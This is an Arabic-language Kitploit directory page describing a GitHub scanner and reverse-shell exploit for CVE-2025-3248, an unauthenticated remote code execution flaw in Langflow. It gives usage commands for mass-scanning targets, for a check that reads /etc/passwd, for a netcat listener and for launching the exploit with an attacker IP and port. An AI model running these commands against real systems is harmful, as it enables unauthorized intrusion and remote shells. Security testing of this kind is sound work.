Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3248 — ماسح ضوئي واستغلال لـ CVE-2025-3248، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليها في Langflow AI. يتضمن فاحص ثغرات ومولّد حمولة صدفة عكسية لاختبارات أمنية مصرح بها. | Kitploit
أدوات/GitHubGitHub/r0otk3r/cve-2025-3248
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

ماسح ضوئي واستغلال لـ CVE-2025-3248، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليها في Langflow AI. يتضمن فاحص ثغرات ومولّد حمولة صدفة عكسية لاختبارات أمنية مصرح بها.

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-3248: تنفيذ التعليمات البرمجية عن بُعد (RCE) غير المصادق عليه في Langflow

يحتوي هذا المستودع على سكربتين بلغة بايثون:

  • LangflowCheck.py: ماسح ضوئي يتحقق من مثيلات Langflow AI المعرضة لثغرة CVE-2025-3248.
  • exploit.py: استغلال shell عكسي يعمل ضد أهداف Langflow المعرضة للخطر.

ملخص

CVE-2025-3248 هي ثغرة حرجة في Langflow AI تسمح للمهاجمين غير المصادق عليهم بتنفيذ كود بايثون عشوائي عن بُعد عبر حمولة مُصمَّمة تُرسل إلى /api/v1/validate/code.


الملفات

LangflowCheck.py

  • يتحقق مما إذا كان الهدف معرضًا للخطر عبر محاولة تنفيذ حمولة غير ضارة تقرأ ملف /etc/passwd.
  • يمكنه فحص هدف واحد أو قائمة عناوين URL.
  • يدعم إخراج الأهداف المعرضة للخطر إلى ملف.
  • exploit.py

    • يرسل حمولة shell عكسي إلى نقطة النهاية المعرضة للخطر.
    • يتطلب عنوان IP للمهاجم (lhost) ومنفذ الاستماع (lport).
    • يسجل النشاط في ملف exploit.log.
    • يدعم التحقق من وجود مستمع قبل إرسال الحمولة.

    الاستخدام

    1. تثبيت المتطلبات

    root@kitploit:~
    pip install -r requirements.txt
    

    2. تشغيل ماسح الثغرات

    عنوان URL واحد

    root@kitploit:~
    python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
    

    1

    أهداف متعددة

    root@kitploit:~
    python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
    

    tt

    3. استغلال هدف

    أولاً، ابدأ مستمعًا

    root@kitploit:~
    sudo nc -nvlp 4444
    

    l

    ثم شغّل الاستغلال:

    root@kitploit:~
    python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
    

    2

    يجب أن تستلم shell إذا كان الهدف معرضًا للخطر. root

    ⚠️ إخلاء مسؤولية

    هذا الاستغلال مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


    القنوات الرسمية

    • YouTube @rootctf
    • X @r0otk3r
    تنزيل الأداة